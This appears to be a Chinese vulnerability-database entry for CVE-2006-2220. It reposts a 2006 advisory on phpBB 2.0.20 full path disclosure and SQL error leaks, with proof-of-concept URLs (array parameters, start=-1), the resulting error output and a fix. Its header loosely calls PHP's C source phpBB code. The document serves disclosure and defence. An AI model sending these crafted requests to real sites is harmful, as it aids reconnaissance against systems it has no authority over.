CVE-2006-2220
CVSS5.0
发布时间 :2007-02-08 12:28:00
修订时间 :2016-10-17 23:39:49
NMCOP    

[原文]phpBB 2.0.20 does not properly verify user-specified input variables used as limits to SQL queries, which allows remote attackers to obtain sensitive information via a negative LIMIT specification, as demonstrated by the start parameter to memberlist.php, which reveals the SQL query in the resulting error message.


[CNNVD]phpBB完整路径泄露漏洞(CNNVD-200702-159)

        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等
        完整路径泄漏,在phpBB的htmlspecialchars()函数中:
        ...
         if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, \
        "e_style, &hint_charset, &hint_charset_len) == FAILURE) { return;
         }
        ...
        如果变量非字符串的话,就可能泄漏完整路径。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2220
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2220
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200702-159
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=114695651425026&w=2
(UNKNOWN)  BUGTRAQ  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=bugtraq&m=114731067321710&w=2
(UNKNOWN)  BUGTRAQ  20060508 Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=full-disclosure&m=114685931319903&w=2
(UNKNOWN)  FULLDISC  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://securityreason.com/securityalert/837
(UNKNOWN)  SREASON  837
http://xforce.iss.net/xforce/xfdb/26306
(UNKNOWN)  XF  phpbb-multiple-path-disclosure(26306)

- 漏洞信息

phpBB完整路径泄露漏洞
中危 未知
2007-02-08 00:00:00 2007-02-09 00:00:00
远程  
        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等
        完整路径泄漏,在phpBB的htmlspecialchars()函数中:
        ...
         if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, \
        "e_style, &hint_charset, &hint_charset_len) == FAILURE) { return;
         }
        ...
        如果变量非字符串的话,就可能泄漏完整路径。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.phpbb.com

- 漏洞信息 (F46123)

phpbb2020.txt (PacketStormID:F46123)
2006-05-06 00:00:00
Maksymilian Arciemowicz  securityreason.com
advisory
CVE-2006-2219,CVE-2006-2220
[点击下载]

phpBB version 2.0.20 suffers from full path disclosure and SQL errors.

Source: http://securityreason.com/achievement_securityalert/38

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006

from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars()

...
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) {
		return;
	}
...

As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
	$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
	$mode = 'joined';
}
- ---Code ---

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

Problem appears if display_errors==1, but it exists on many websites. (even at php.net).

- --- 2. Sql Errors ---

Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
- ---Code ---

- ---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
- ---Result ---

- --- 3. How to fix ---
Turn off display_errors or use function like is_string().

- --- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

25568
phpBB Malformed SQL Query Information Disclosure
Information Disclosure
Loss of Confidentiality

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-05 Unknow
2006-05-05 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站